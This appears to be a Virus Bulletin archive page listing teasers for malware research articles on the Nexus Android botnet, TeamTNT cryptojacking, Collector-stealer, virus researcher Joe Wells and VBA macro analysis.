Nexus Android banking botnet – compromising C&C panels and dissecting mobile AppInjects

Aditya Sood & Rohit Bansal provide details of a security vulnerability in the Nexus Android botnet C&C panel that was exploited to compromise the C&C panel in order to gather threat intelligence, and present a model of mobile AppInjects.

Cryptojacking on the fly: TeamTNT using NVIDIA drivers to mine cryptocurrency

TeamTNT is known for attacking insecure and vulnerable Kubernetes deployments in order to infiltrate organizations’ dedicated environments and transform them into attack launchpads. In this article Aditya Sood presents a new module introduced by…

Collector-stealer: a Russian origin credential and information extractor

Collector-stealer, a piece of malware of Russian origin, is heavily used on the Internet to exfiltrate sensitive data from end-user systems and store it in its C&C panels. In this article, researchers Aditya K Sood and Rohit Chaturvedi present a 360…

Fighting Fire with Fire

In 1989, Joe Wells encountered his first virus: Jerusalem. He disassembled the virus, and from that moment onward, was intrigued by the properties of these small pieces of self-replicating code. Joe Wells was an expert on computer viruses, was partly…

Run your malicious VBA macros anywhere!

Kurt Natvig wanted to understand whether it’s possible to recompile VBA macros to another language, which could then easily be ‘run’ on any gateway, thus revealing a sample’s true nature in a safe manner. In this article he explains how he recompiled…


Bulletin Archive

We have placed cookies on your device in order to improve the functionality of this site, as outlined in our cookies policy. However, you may delete and block all cookies from this site and your use of the site will be unaffected. By continuing to browse this site, you are agreeing to Virus Bulletin's use of data as outlined in our privacy policy.